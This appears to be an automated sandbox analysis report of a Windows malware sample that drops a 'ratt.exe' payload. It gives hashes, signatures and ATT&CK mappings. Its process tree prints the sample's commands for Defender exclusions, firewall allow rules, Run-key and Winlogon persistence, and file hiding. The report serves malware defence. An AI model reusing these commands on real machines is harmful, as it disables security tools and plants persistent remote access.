6979f98272d430047bec9b8dd65790746822563518efdc54fe1d959afda59cb3

Analysis

max time kernel
49s
max time network
145s
platform
windows10-2004_x64
resource
win10v2004-20230703-en
resource tags

arch:x64arch:x86image:win10v2004-20230703-enlocale:en-usos:windows10-2004-x64system
submitted
08/08/2023, 09:11

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

6979f98272d430047bec9b8dd65790746822563518efdc54fe1d959afda59cb3.exe
Size

1.4MB
MD5

f75a8bf0a5eb40fabd38f6e476a614ca
SHA1

ee6e5429e88799aaecdcd7da1d470926422a465d
SHA256

6979f98272d430047bec9b8dd65790746822563518efdc54fe1d959afda59cb3
SHA512

8952e69e95f0fb0c388fe08a1a7171284b07edbc57598bc39de6f7063cd47af3e7bba27cdd108fea41d3afd71cbb53b991066b54e772c8887a435b6fe87c4a14
SSDEEP

24576:U2G/nvxW3Ww0tRp8GiXTBhq7yRDvHcUcjUvy0lr3Tl6icOB/UWoT:UbA30H4zF0UMSAicOB/UWk

Score

8^/10

evasion upx

Malware Config

Signatures

Modifies Windows Firewall 1 TTPs 2 IoCs

evasion

Windows Service

T1543.003

pid	Process
4796	netsh.exe
4492	netsh.exe

ACProtect 1.3x - 1.4x DLL software 2 IoCs

Detects file using ACProtect software.

resource	yara_rule
behavioral1/files/0x00070000000231cf-234.dat	acprotect
behavioral1/files/0x00070000000231cf-235.dat	acprotect

Executes dropped EXE 1 IoCs

pid	Process
4104	7z.exe

Loads dropped DLL 1 IoCs

pid	Process
4104	7z.exe

UPX packed file 7 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x00070000000231d0-231.dat	upx
behavioral1/memory/4104-232-0x0000000000400000-0x0000000000432000-memory.dmp	upx
behavioral1/files/0x00070000000231d0-233.dat	upx
behavioral1/files/0x00070000000231cf-234.dat	upx
behavioral1/files/0x00070000000231cf-235.dat	upx
behavioral1/memory/4104-236-0x0000000010000000-0x00000000100E2000-memory.dmp	upx
behavioral1/memory/4104-240-0x0000000000400000-0x0000000000432000-memory.dmp	upx

Unexpected DNS network traffic destination 3 IoCs

Network traffic to other servers than the configured DNS servers was detected on the DNS port.

description	ioc
Destination IP	208.67.222.222
Destination IP	208.67.222.222
Destination IP	208.67.222.222

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Runs ping.exe 1 TTPs 2 IoCs

Remote System Discovery

T1018

pid	Process
1744	PING.EXE
2072	PING.EXE

Suspicious behavior: EnumeratesProcesses 12 IoCs

pid	Process
548	powershell.exe
548	powershell.exe
2452	powershell.exe
2452	powershell.exe
2864	powershell.exe
2864	powershell.exe
652	powershell.exe
652	powershell.exe
4340	powershell.exe
4340	powershell.exe
1352	powershell.exe
1352	powershell.exe

Suspicious use of AdjustPrivilegeToken 48 IoCs

description	pid	Process
Token: SeIncreaseQuotaPrivilege	3404	WMIC.exe
Token: SeSecurityPrivilege	3404	WMIC.exe
Token: SeTakeOwnershipPrivilege	3404	WMIC.exe
Token: SeLoadDriverPrivilege	3404	WMIC.exe
Token: SeSystemProfilePrivilege	3404	WMIC.exe
Token: SeSystemtimePrivilege	3404	WMIC.exe
Token: SeProfSingleProcessPrivilege	3404	WMIC.exe
Token: SeIncBasePriorityPrivilege	3404	WMIC.exe
Token: SeCreatePagefilePrivilege	3404	WMIC.exe
Token: SeBackupPrivilege	3404	WMIC.exe
Token: SeRestorePrivilege	3404	WMIC.exe
Token: SeShutdownPrivilege	3404	WMIC.exe
Token: SeDebugPrivilege	3404	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3404	WMIC.exe
Token: SeRemoteShutdownPrivilege	3404	WMIC.exe
Token: SeUndockPrivilege	3404	WMIC.exe
Token: SeManageVolumePrivilege	3404	WMIC.exe
Token: 33	3404	WMIC.exe
Token: 34	3404	WMIC.exe
Token: 35	3404	WMIC.exe
Token: 36	3404	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3404	WMIC.exe
Token: SeSecurityPrivilege	3404	WMIC.exe
Token: SeTakeOwnershipPrivilege	3404	WMIC.exe
Token: SeLoadDriverPrivilege	3404	WMIC.exe
Token: SeSystemProfilePrivilege	3404	WMIC.exe
Token: SeSystemtimePrivilege	3404	WMIC.exe
Token: SeProfSingleProcessPrivilege	3404	WMIC.exe
Token: SeIncBasePriorityPrivilege	3404	WMIC.exe
Token: SeCreatePagefilePrivilege	3404	WMIC.exe
Token: SeBackupPrivilege	3404	WMIC.exe
Token: SeRestorePrivilege	3404	WMIC.exe
Token: SeShutdownPrivilege	3404	WMIC.exe
Token: SeDebugPrivilege	3404	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3404	WMIC.exe
Token: SeRemoteShutdownPrivilege	3404	WMIC.exe
Token: SeUndockPrivilege	3404	WMIC.exe
Token: SeManageVolumePrivilege	3404	WMIC.exe
Token: 33	3404	WMIC.exe
Token: 34	3404	WMIC.exe
Token: 35	3404	WMIC.exe
Token: 36	3404	WMIC.exe
Token: SeDebugPrivilege	548	powershell.exe
Token: SeDebugPrivilege	2452	powershell.exe
Token: SeDebugPrivilege	2864	powershell.exe
Token: SeDebugPrivilege	652	powershell.exe
Token: SeDebugPrivilege	4340	powershell.exe
Token: SeDebugPrivilege	1352	powershell.exe

Suspicious use of WriteProcessMemory 39 IoCs

description	pid	Process	procid_target
PID 1296 wrote to memory of 3348	1296	6979f98272d430047bec9b8dd65790746822563518efdc54fe1d959afda59cb3.exe	80
PID 1296 wrote to memory of 3348	1296	6979f98272d430047bec9b8dd65790746822563518efdc54fe1d959afda59cb3.exe	80
PID 1296 wrote to memory of 3348	1296	6979f98272d430047bec9b8dd65790746822563518efdc54fe1d959afda59cb3.exe	80
PID 3348 wrote to memory of 3560	3348	cmd.exe	84
PID 3348 wrote to memory of 3560	3348	cmd.exe	84
PID 3348 wrote to memory of 3560	3348	cmd.exe	84
PID 3560 wrote to memory of 3532	3560	cmd.exe	85
PID 3560 wrote to memory of 3532	3560	cmd.exe	85
PID 3560 wrote to memory of 3532	3560	cmd.exe	85
PID 3348 wrote to memory of 2428	3348	cmd.exe	86
PID 3348 wrote to memory of 2428	3348	cmd.exe	86
PID 3348 wrote to memory of 2428	3348	cmd.exe	86
PID 2428 wrote to memory of 3404	2428	cmd.exe	87
PID 2428 wrote to memory of 3404	2428	cmd.exe	87
PID 2428 wrote to memory of 3404	2428	cmd.exe	87
PID 3348 wrote to memory of 548	3348	cmd.exe	89
PID 3348 wrote to memory of 548	3348	cmd.exe	89
PID 3348 wrote to memory of 548	3348	cmd.exe	89
PID 3348 wrote to memory of 2452	3348	cmd.exe	93
PID 3348 wrote to memory of 2452	3348	cmd.exe	93
PID 3348 wrote to memory of 2452	3348	cmd.exe	93
PID 3348 wrote to memory of 2864	3348	cmd.exe	94
PID 3348 wrote to memory of 2864	3348	cmd.exe	94
PID 3348 wrote to memory of 2864	3348	cmd.exe	94
PID 3348 wrote to memory of 652	3348	cmd.exe	96
PID 3348 wrote to memory of 652	3348	cmd.exe	96
PID 3348 wrote to memory of 652	3348	cmd.exe	96
PID 3348 wrote to memory of 4340	3348	cmd.exe	99
PID 3348 wrote to memory of 4340	3348	cmd.exe	99
PID 3348 wrote to memory of 4340	3348	cmd.exe	99
PID 3348 wrote to memory of 4104	3348	cmd.exe	100
PID 3348 wrote to memory of 4104	3348	cmd.exe	100
PID 3348 wrote to memory of 4104	3348	cmd.exe	100
PID 3348 wrote to memory of 1352	3348	cmd.exe	102
PID 3348 wrote to memory of 1352	3348	cmd.exe	102
PID 3348 wrote to memory of 1352	3348	cmd.exe	102
PID 1352 wrote to memory of 4796	1352	powershell.exe	104
PID 1352 wrote to memory of 4796	1352	powershell.exe	104
PID 1352 wrote to memory of 4796	1352	powershell.exe	104

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
2948	attrib.exe

C:\Users\Admin\AppData\Local\Temp\6979f98272d430047bec9b8dd65790746822563518efdc54fe1d959afda59cb3.exe
"C:\Users\Admin\AppData\Local\Temp\6979f98272d430047bec9b8dd65790746822563518efdc54fe1d959afda59cb3.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1296
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ratt.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3348
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c nslookup myip.opendns.com. resolver1.opendns.com
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3560
  - - C:\Windows\SysWOW64\nslookup.exe
      nslookup myip.opendns.com. resolver1.opendns.com
      4⤵
      PID:3532
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic ComputerSystem get Domain
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2428
  - - C:\Windows\SysWOW64\Wbem\WMIC.exe
      wmic ComputerSystem get Domain
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3404
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    Powershell -Command 'Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\ratt.exe"'
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:548
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    Powershell -Command 'Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\"'
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2452
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    Powershell -Command 'Add-MpPreference -ExclusionPath "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ratt.exe"'
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2864
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    Powershell -Command 'Add-MpPreference -ExclusionPath "$Env:SystemDrive\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp"'
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:652
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    Powershell -Command 'Add-MpPreference -ExclusionProcess "C:\Users\Admin\AppData\Local\Temp\ratt.exe"'
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4340
- - C:\Users\Admin\AppData\Local\Temp\7z.exe
    7z.exe x -o"C:\Users\Admin\AppData\Local\Temp" -y ratt.7z
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:4104
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell -executionpolicy RemoteSigned -WindowStyle Hidden -file Add.ps1
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1352
  - - C:\Windows\SysWOW64\netsh.exe
      "C:\Windows\system32\netsh.exe" advfirewall firewall add rule name=SecuritySystem dir=in action=allow "program=C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe" enable=yes
      4⤵
      Modifies Windows Firewall
      PID:4796
  - - C:\Windows\SysWOW64\netsh.exe
      "C:\Windows\system32\netsh.exe" advfirewall firewall add rule name=SecuritySystem dir=out action=allow "program=C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe" enable=yes
      4⤵
      Modifies Windows Firewall
      PID:4492
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe"
      4⤵
      PID:5020
    - - C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        wmic computersystem where name="MSXGLQPS" set AutomaticManagedPagefile=False
        5⤵
        
        PID:2144
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe"
      4⤵
      PID:2148
    - - C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        wmic pagefileset where name="C:\\pagefile.sys" set InitialSize=15000,MaximumSize=20000
        5⤵
        
        PID:4156
  - - C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe
      "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe"
      4⤵
      PID:2576
    - - C:\Windows\SysWOW64\cmd.exe
        
        "cmd" /c ping 127.0.0.1 -n 9 > nul && REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\Admin\Music\rot.exe,"
        5⤵
        
        PID:2068
      - C:\Windows\SysWOW64\PING.EXE
        
        ping 127.0.0.1 -n 9
        6⤵
        Runs ping.exe
        
        PID:1744
    - - C:\Windows\SysWOW64\cmd.exe
        
        "cmd" /c ping 127.0.0.1 -n 20 > nul && copy "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe" "C:\Users\Admin\Music\rot.exe" && ping 127.0.0.1 -n 20 > nul && "C:\Users\Admin\Music\rot.exe"
        5⤵
        
        PID:2464
      - C:\Windows\SysWOW64\PING.EXE
        
        ping 127.0.0.1 -n 20
        6⤵
        Runs ping.exe
        
        PID:2072
  - - C:\Windows\SysWOW64\attrib.exe
      "C:\Windows\system32\attrib.exe" +h "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe"
      4⤵
      Views/modifies file attributes
      PID:2948
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "ratt" /t REG_SZ /d "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ratt.exe" /F
    3⤵
    PID:3260
- - C:\Users\Admin\AppData\Local\Temp\ratt.exe
    "ratt.exe"
    3⤵
    PID:3444

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Credential Access

Discovery

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe

Filesize
595.2MB

MD5
129cda1088a1d19c3beec16f30388513

SHA1
cbe00bd14f08a9c79261106186fb7b9a5243d5c4

SHA256
130b81f72bcad8bccd05e7e5c0179571979d28f945e04087ddfcceef7ec1c331

SHA512
acb2a0c6589a005977679bd824e2967ced450d318b700b58ac3894553ab9e5a9747367bc81ff922b62f3b5874572b6f5adc50df95d52e47cf073a7ee571a86cf

Download Submit
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe

Filesize
123.8MB

MD5
3e30f72187931777ea3cc1e1e453fd52

SHA1
2678af2e1878a29dfa448068230eacc8cc357650

SHA256
9f7dfde9f148bfe929a989a1499dadb417a78b01a830d7cd7aeea546034fb327

SHA512
e97ccf37a7febd476a0f5c97da72d71acd430d2db950e783eca64a3f2a691c807c63f60cbbefc2cb0c1498499f575cf333689601b6888e3896ea132d18d4fd04

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
1KB

MD5
33b19d75aa77114216dbc23f43b195e3

SHA1
36a6c3975e619e0c5232aa4f5b7dc1fec9525535

SHA256
b23ced31b855e5a39c94afa1f9d55b023b8c40d4dc62143e0539c6916c12c9d2

SHA512
676fa2fd34878b75e5899197fe6826bb5604541aa468804bc9835bd3acabed2e6759878a8f1358955413818a51456816e90f149133828575a416c2a74fc7d821

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
11KB

MD5
7e7a0a0ad9f6a400d793169c226ae320

SHA1
9a1fcd0a247e692e01eb89805db917aa92bfe5dd

SHA256
ba96f7f9794ea788ed6109dacadc1972ad838bdc4ab861143749b458740d8482

SHA512
38b8bb162a234642ffd54452f715ddc053a263979ceb760f88a9943755d5bc5b7611cad948ed3f960ab095303aaae5040f3d682c965426409682b7b9fadbadba

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
11KB

MD5
8b09a701ac92c10634048817d726e80c

SHA1
b1e6ae512ac05fe7ab45537ce8375af4345bbd43

SHA256
f7a1a68c3aec6fbd39d487db9b6b915513cbda69ac2750a0b421a3de707367b0

SHA512
22a2b83fc6e600f6d53ea838630fb83ab49093171c76338a713779ff31c84da5d6317bcfe248cc8439b0178fbb4c8bde9282a5037b0dbc4aecb299133d1a24e7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
11KB

MD5
4fe62fcfb1b4ffca4435f11a1a1c5fe4

SHA1
eaeb8a89537308376e3e7e6c0e6a153c68ffb7cd

SHA256
4717e4ea6f8d60e0aac65ccf7e37c79985ccebf87c3de905611605f621cff482

SHA512
6d6dc125442ea48f025daf46d05a7b5ce1e415aa7c7bc62244de24746107c8c48e1268deb3a2778058775859369664a125234bb89050a5a5702af035e68986e8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
11KB

MD5
2d01cf3b807ceaae186da2194c0568f7

SHA1
cb3beefdd22d0e1a715676e56eacab2795af487c

SHA256
6947606813cd60e2150919e31211cff75fa71482b52d10a18e9c0acdeff996f4

SHA512
fcebfd06004afac36a9a8a7b738802a6bbf258689760e2d4c05fe2082170f3dce2c724a7c6a59760ef836d9715a3990db78e408369ca84dbd0260cf4dbf21c5e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
11KB

MD5
ed6fbad254f8c1799c8e3c51e8739378

SHA1
18662ea0de3865820e707a94bbe6950d383eac66

SHA256
e012c14d8e6270b2ef6b1808361cb4ac5876f7d45f17fab7912c040247346793

SHA512
a4c568d587519a96ca82858c869c9a2d2983ee5b0b7df7b9dda47646ba10582af36d9dfd597ddb1fcb8bff0906f2c5a1cee6a61da1d2e4556fea6d5903716276

Download Submit
C:\Users\Admin\AppData\Local\Temp\7z.dll

Filesize
328KB

MD5
15bbbe562f9be3e5dcbb834e635cc231

SHA1
7c01cf5fa4db2312c5ed2f7b8c41e3e5c346a51a

SHA256
ed50ef8e0b6dd83fb0c3f733329d4aa6e5a3beb3491e2ba9d2ae206813508dde

SHA512
769287951b8c16f4b10c1b58e82612844babe7b5c10445fe848d713fb5e8321bcbbd9780e9c564cffe35ea4144e8a7e19645291c4eea372fcaa19ae395a97287

Download Submit
C:\Users\Admin\AppData\Local\Temp\7z.dll

Filesize
328KB

MD5
15bbbe562f9be3e5dcbb834e635cc231

SHA1
7c01cf5fa4db2312c5ed2f7b8c41e3e5c346a51a

SHA256
ed50ef8e0b6dd83fb0c3f733329d4aa6e5a3beb3491e2ba9d2ae206813508dde

SHA512
769287951b8c16f4b10c1b58e82612844babe7b5c10445fe848d713fb5e8321bcbbd9780e9c564cffe35ea4144e8a7e19645291c4eea372fcaa19ae395a97287

Download Submit
C:\Users\Admin\AppData\Local\Temp\7z.exe

Filesize
71KB

MD5
8ba2e41b330ae9356e62eb63514cf82e

SHA1
8dc266467a5a0d587ed0181d4344581ef4ff30b2

SHA256
ea2ad8d87b79c8eb3952498c7005a195986436cfd7ca7736dbbdda979142daea

SHA512
2fdfc2d368c70320b3dac00fef06381ef90a2a82a1f3137109b033d84e5b70185039af6ec918012dc03bc9d046cd8d8aee3247ba0f59d394e78f1f73380f7a1d

Download Submit
C:\Users\Admin\AppData\Local\Temp\7z.exe

Filesize
71KB

MD5
8ba2e41b330ae9356e62eb63514cf82e

SHA1
8dc266467a5a0d587ed0181d4344581ef4ff30b2

SHA256
ea2ad8d87b79c8eb3952498c7005a195986436cfd7ca7736dbbdda979142daea

SHA512
2fdfc2d368c70320b3dac00fef06381ef90a2a82a1f3137109b033d84e5b70185039af6ec918012dc03bc9d046cd8d8aee3247ba0f59d394e78f1f73380f7a1d

Download Submit
C:\Users\Admin\AppData\Local\Temp\Add.ps1

Filesize
1KB

MD5
0df43097e0f0acd04d9e17fb43d618b9

SHA1
69b3ade12cb228393a93624e65f41604a17c83b6

SHA256
c8e4a63337a25f55f75ad10ab2b420d716bad4b35a2044fd39dcd5936419d873

SHA512
01ae71dd2ee040baad6f4b9afcfbaeca2b9f6cc7d60ade5de637238d65c17d74292734666f4ae6b533f6bf1007c46387d8e690d97c3b7a535bcd6f216e70c4fb

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_bqugiypq.30y.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\ratt.7z

Filesize
693KB

MD5
7de6fdf3629c73bf0c29a96fa23ae055

SHA1
dcb37f6d43977601c6460b17387a89b9e4c0609a

SHA256
069979bfb2aefe3cac239fe4f2477672eb75b90c9853fb67b2ac1438f2ec44ff

SHA512
d1ef2299aacf429572fd6df185009960e601e49126f080fdced26ec407e5db86eaa902e474635464aac146b7de286667a398f2c5e46c4a821dad2579bfb3acf8

Download Submit
C:\Users\Admin\AppData\Local\Temp\ratt.bat

Filesize
1KB

MD5
7ea1fec84d76294d9256ae3dca7676b2

SHA1
1e335451d1cbb6951bc77bf75430f4d983491342

SHA256
9a419095c0bafc6b550f3f760c7b4f91ef3a956cfa6403d3750164ecdbe35940

SHA512
ab712c45081b3d1c7edd03e67a8db1518a546f3fbf00e99838dfe03a689c4867a6953e6603dcd2be458b2441f4a2b70286fd7d096549cfcf032dd2cd54d68317

Download Submit
C:\Users\Admin\AppData\Local\Temp\ratt.exe

Filesize
745.1MB

MD5
be788bb3680cf3809d9678ee6f7ba321

SHA1
499f01d5f654f83e172004dcc03f99abdd251734

SHA256
03a17a2b669f72df082569ea477977d824796da3b6b7a8d0e6f91f2629ef406b

SHA512
83c0b885740a57b84b2c909d0d6bb25baaa49d62499773030b59058325f37a5fcf39a1cd59ef9c229ca7289af7250034f6652e449625b67c2d260b285ddb9a8e

Download Submit
C:\Users\Admin\AppData\Local\Temp\ratt.exe

Filesize
29.8MB

MD5
462dfc7078dbf14dd84f2f3e89a48b13

SHA1
50f06cad4b713aa8cfb258eb853ceffb26780d2e

SHA256
69b4cf3c39ebbcb80c1aa718b1ddf9f4f393cb593c0ddeb74b00ea487876fe1c

SHA512
7474a47ae76913cfcf18b0ecd9a80f29b01bc3ca3f60a9c6ebb00bcc4530714f5a94a4249307939150a55e3850f7ddf55f53d6fa5c984c2be2e32babe34e4a00

Download Submit
memory/548-162-0x00000000067D0000-0x00000000067EE000-memory.dmp

Filesize
120KB

Download
memory/548-149-0x0000000005AB0000-0x00000000060D8000-memory.dmp

Filesize
6.2MB

Download
memory/548-151-0x00000000060E0000-0x0000000006146000-memory.dmp

Filesize
408KB

Download
memory/548-163-0x0000000005470000-0x0000000005480000-memory.dmp

Filesize
64KB

Download
memory/548-166-0x00000000744A0000-0x0000000074C50000-memory.dmp

Filesize
7.7MB

Download
memory/548-146-0x00000000031A0000-0x00000000031D6000-memory.dmp

Filesize
216KB

Download
memory/548-147-0x00000000744A0000-0x0000000074C50000-memory.dmp

Filesize
7.7MB

Download
memory/548-152-0x0000000006150000-0x00000000061B6000-memory.dmp

Filesize
408KB

Download
memory/548-150-0x00000000057F0000-0x0000000005812000-memory.dmp

Filesize
136KB

Download
memory/548-148-0x0000000005470000-0x0000000005480000-memory.dmp

Filesize
64KB

Download
memory/652-200-0x0000000004D70000-0x0000000004D80000-memory.dmp

Filesize
64KB

Download
memory/652-213-0x00000000744A0000-0x0000000074C50000-memory.dmp

Filesize
7.7MB

Download
memory/652-212-0x0000000004D70000-0x0000000004D80000-memory.dmp

Filesize
64KB

Download
memory/652-199-0x0000000004D70000-0x0000000004D80000-memory.dmp

Filesize
64KB

Download
memory/652-198-0x00000000744A0000-0x0000000074C50000-memory.dmp

Filesize
7.7MB

Download
memory/1352-278-0x0000000007650000-0x00000000076E6000-memory.dmp

Filesize
600KB

Download
memory/1352-276-0x0000000007420000-0x000000000742A000-memory.dmp

Filesize
40KB

Download
memory/1352-293-0x00000000743D0000-0x0000000074B80000-memory.dmp

Filesize
7.7MB

Download
memory/1352-286-0x0000000008640000-0x0000000008BE4000-memory.dmp

Filesize
5.6MB

Download
memory/1352-285-0x0000000007720000-0x0000000007742000-memory.dmp

Filesize
136KB

Download
memory/1352-283-0x000000007F2D0000-0x000000007F2E0000-memory.dmp

Filesize
64KB

Download
memory/1352-282-0x0000000007620000-0x0000000007628000-memory.dmp

Filesize
32KB

Download
memory/1352-280-0x00000000076F0000-0x000000000770A000-memory.dmp

Filesize
104KB

Download
memory/1352-281-0x0000000002760000-0x0000000002770000-memory.dmp

Filesize
64KB

Download
memory/1352-279-0x00000000075D0000-0x00000000075DE000-memory.dmp

Filesize
56KB

Download
memory/1352-277-0x0000000002760000-0x0000000002770000-memory.dmp

Filesize
64KB

Download
memory/1352-244-0x00000000743D0000-0x0000000074B80000-memory.dmp

Filesize
7.7MB

Download
memory/1352-246-0x0000000002760000-0x0000000002770000-memory.dmp

Filesize
64KB

Download
memory/1352-245-0x0000000002760000-0x0000000002770000-memory.dmp

Filesize
64KB

Download
memory/1352-275-0x0000000002760000-0x0000000002770000-memory.dmp

Filesize
64KB

Download
memory/1352-272-0x0000000007A10000-0x000000000808A000-memory.dmp

Filesize
6.5MB

Download
memory/1352-258-0x0000000002760000-0x0000000002770000-memory.dmp

Filesize
64KB

Download
memory/1352-259-0x000000007F2D0000-0x000000007F2E0000-memory.dmp

Filesize
64KB

Download
memory/1352-260-0x0000000007260000-0x0000000007292000-memory.dmp

Filesize
200KB

Download
memory/1352-261-0x00000000701F0000-0x000000007023C000-memory.dmp

Filesize
304KB

Download
memory/1352-271-0x0000000007220000-0x000000000723E000-memory.dmp

Filesize
120KB

Download
memory/1352-273-0x00000000743D0000-0x0000000074B80000-memory.dmp

Filesize
7.7MB

Download
memory/1352-274-0x00000000073D0000-0x00000000073EA000-memory.dmp

Filesize
104KB

Download
memory/2452-182-0x00000000744A0000-0x0000000074C50000-memory.dmp

Filesize
7.7MB

Download
memory/2452-168-0x00000000744A0000-0x0000000074C50000-memory.dmp

Filesize
7.7MB

Download
memory/2452-169-0x0000000005020000-0x0000000005030000-memory.dmp

Filesize
64KB

Download
memory/2452-181-0x0000000005020000-0x0000000005030000-memory.dmp

Filesize
64KB

Download
memory/2576-294-0x0000000004CA0000-0x0000000004D32000-memory.dmp

Filesize
584KB

Download
memory/2576-296-0x0000000004E60000-0x0000000004E6A000-memory.dmp

Filesize
40KB

Download
memory/2576-302-0x0000000004EE0000-0x0000000004EF0000-memory.dmp

Filesize
64KB

Download
memory/2576-298-0x0000000004EE0000-0x0000000004EF0000-memory.dmp

Filesize
64KB

Download
memory/2576-297-0x00000000743D0000-0x0000000074B80000-memory.dmp

Filesize
7.7MB

Download
memory/2576-295-0x0000000004EE0000-0x0000000004EF0000-memory.dmp

Filesize
64KB

Download
memory/2576-292-0x0000000004C00000-0x0000000004C9C000-memory.dmp

Filesize
624KB

Download
memory/2576-291-0x0000000000C40000-0x0000000000DF6000-memory.dmp

Filesize
1.7MB

Download
memory/2576-289-0x00000000743D0000-0x0000000074B80000-memory.dmp

Filesize
7.7MB

Download
memory/2864-196-0x00000000027A0000-0x00000000027B0000-memory.dmp

Filesize
64KB

Download
memory/2864-197-0x00000000744A0000-0x0000000074C50000-memory.dmp

Filesize
7.7MB

Download
memory/2864-183-0x00000000744A0000-0x0000000074C50000-memory.dmp

Filesize
7.7MB

Download
memory/2864-184-0x00000000027A0000-0x00000000027B0000-memory.dmp

Filesize
64KB

Download
memory/3444-301-0x00000000743D0000-0x0000000074B80000-memory.dmp

Filesize
7.7MB

Download
memory/3444-300-0x0000000000040000-0x00000000001F6000-memory.dmp

Filesize
1.7MB

Download
memory/4104-236-0x0000000010000000-0x00000000100E2000-memory.dmp

Filesize
904KB

Download
memory/4104-232-0x0000000000400000-0x0000000000432000-memory.dmp

Filesize
200KB

Download
memory/4104-240-0x0000000000400000-0x0000000000432000-memory.dmp

Filesize
200KB

Download
memory/4340-216-0x00000000033E0000-0x00000000033F0000-memory.dmp

Filesize
64KB

Download
memory/4340-214-0x00000000744A0000-0x0000000074C50000-memory.dmp

Filesize
7.7MB

Download
memory/4340-215-0x00000000033E0000-0x00000000033F0000-memory.dmp

Filesize
64KB

Download
memory/4340-228-0x00000000033E0000-0x00000000033F0000-memory.dmp

Filesize
64KB

Download
memory/4340-229-0x00000000744A0000-0x0000000074C50000-memory.dmp

Filesize
7.7MB

Download